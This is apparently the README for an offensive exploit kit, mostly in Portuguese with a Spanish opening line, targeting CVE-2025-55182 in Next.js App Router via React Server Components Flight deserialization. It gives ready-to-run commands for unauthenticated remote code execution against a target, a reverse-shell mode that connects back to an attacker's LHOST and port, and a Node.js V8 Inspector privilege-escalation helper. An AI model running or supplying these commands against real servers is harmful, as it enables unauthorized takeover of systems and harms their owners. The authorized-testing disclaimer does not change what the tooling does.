
Exploit autónomo para CVE-2025-55182 que logra RCE no autenticado en Next.js App Router mediante la deserialización de React Server Components Flight, con shell inversa y asistente de escalada de privilegios del Inspector V8 de Node.js.
Exploit autônomo para CVE-2025-55182 em aplicativos Next.js App Router que habilitam React Server Components. Payloads RSC Flight elaborados para o endpoint de server-action fornecem execução remota de código não autenticada. Inclui um auxiliar de escalonamento de privilégios local Node.js V8 Inspector (debug-port) que executa código em um processo privilegiado via bypass de sandbox process.mainModule.require.
CVE: CVE-2025-55182
python3 -m pip install requests # para o(s) PoC(s) em Python
cdp_privesc.pypython3 cdp_privesc.py <alvo>
react2shell-poc.pypython3 react2shell-poc.py -t http://TARGET:3000 -c "id" # exfiltração de comando baseada em erro
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost LHOST --lport 4444
react2shell-poc.py é o PoC público de CVE-2025-55182 de p3ta00, incorporado inalterado
de https://github.com/p3ta00/react2shell-poc para uma cadeia autossuficiente.
cdp_privesc.py (o privesc local Node.js V8 Inspector) é original.
Apenas para testes de segurança autorizados e fins educacionais. Execute somente contra sistemas que você possui ou para os quais tem permissão escrita explícita para testar.
Autor: r3vpwnx